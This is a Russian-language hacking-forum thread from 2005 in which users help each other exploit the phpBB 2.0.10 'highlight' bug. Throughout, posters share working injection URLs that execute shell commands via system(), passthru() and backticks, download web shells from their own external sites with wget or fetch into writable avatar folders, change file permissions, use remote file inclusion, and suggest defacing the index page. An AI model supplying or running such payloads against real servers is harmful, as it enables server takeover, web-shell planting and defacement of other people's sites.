ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу phpBB>2.0.10 highlight
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

highlight
  #1  
Старый 16.11.2005, 18:03
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию highlight
В общем, необходимо взломать форум phpbb 2.0.10 путём эксплуатации баги в highlight.
Мне не нужно взламывать конкретный форум, просто хочу научиться использовать эту багу.

Вот что я пробовал:
Код:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`pwd`.%2527
Выдаёт(там где должно быть имя чела):
Код:
/pub/home/taymen30/сайт/forum
Потом пробую:
Код:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l
Выдаёт:)\b#i

В чём я делаю ошибку?Может кто поможет...
 
Ответить с цитированием

  #2  
Старый 16.11.2005, 18:26
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
viewtopic.php?t=275&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'
 
Ответить с цитированием

  #3  
Старый 16.11.2005, 20:00
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию
k1borg, спасибо! Ты мне помог, опираясь на твою подсказку я нашёл де-то на других форумах другой код. Но теперь возникла другая проблема. Например, делаю такой запрос:

Код:
http://форум/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=ls%20-l%20/usr/home/сайт/public_html/директория форума/images
Всё ОК, выдаёт все файлы. Смотрю, у директории avatars права drwxrwxrwx
Делаю запрос:

Код:
http://сайт/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=wget%20http://мой сайт.narod.ru/shell.php%20-P%20/usr/home/сайт/public_html/форум/images/avatars/
Затем смотрюнет ли шелла через ls- его нет ни в директории avatars нигде! =(
 
Ответить с цитированием

  #4  
Старый 17.11.2005, 00:27
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию
Всё, народ, справился сам...только одно не получается:я когда закачиваю шелл на форум, то у него права становятся: -rw-------

То есть открыть его я не могу. Что мне делать-то?

Нужно чтобы права стали: -rw-rw----

Закачиваю fetch'ем
Последний раз редактировалось Ван; 17.11.2005 в 00:32..
 
Ответить с цитированием

  #5  
Старый 17.11.2005, 04:04
Аватар для madnet
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


Отправить сообщение для madnet с помощью ICQ
По умолчанию
chmod 755 shell.php
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

Че за....
  #6  
Старый 19.11.2005, 15:53
Аватар для Extrim
Extrim
Banned
Регистрация: 13.11.2005
Сообщений: 26
Провел на форуме:
204359

Репутация: -6
По умолчанию Че за....
Че за белеберда коглда я ввожу:&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l
Получаю:
)\b#i
 
Ответить с цитированием

  #7  
Старый 19.11.2005, 16:26
Аватар для dim_ok
dim_ok
Green member - Level 3
Регистрация: 26.03.2005
Сообщений: 191
Провел на форуме:
6768708

Репутация: 185
По умолчанию
попробуй воспользоваться поиском по форуму, уверен тем с таким содержанием не один десяток, а так возможно запрешено выполнение системных команд в php, пробуй инклюдинг - &test=http://site.com/shell.txt?&highlight=%2527.include($_GET[test]).%2527
__________________
Дайте мне точку опоры и я переверну землю!

irc.antichat.net #antichat
 
Ответить с цитированием

  #8  
Старый 19.11.2005, 17:26
Аватар для dim_ok
dim_ok
Green member - Level 3
Регистрация: 26.03.2005
Сообщений: 191
Провел на форуме:
6768708

Репутация: 185
По умолчанию
Цитата:
Сообщение от Extrim  
Еще вопрос:
Почему после того как я ввожу &highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l
Все ОК
Потом:
viewtopic.php?p=61259&highlight=%2527.$poster=%60$ cmd%60.%2527&cmd=wget%20http://сайт.narod.ru/remview.php%20-P%20/usr/local/www/http/
и тут все начинаеться пишет:
)\b#i
при заливке wget'ом так оно и будет, а если не заливается - возможно wget не установлен на сервере или нет прав на запись
Цитата:
Сообщение от Extrim  
Смотрю в
viewtopic.php?p=61259&highlight=%2527.$poster=%60$ cmd%60.%2527&cmd=ls usr/local/www/http
И файлика чвоего не наблюдаю почемуто это так ????
его там может и не быть
__________________
Дайте мне точку опоры и я переверну землю!

irc.antichat.net #antichat
 
Ответить с цитированием

  #9  
Старый 19.11.2005, 20:14
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию
Попробуй залить GET'ом или fetch'ем.
 
Ответить с цитированием

  #10  
Старый 19.11.2005, 20:32
Аватар для k00p3r
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме:
484586

Репутация: 16


Отправить сообщение для k00p3r с помощью ICQ
По умолчанию
Делай echo в индекс на крайняк и всё.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ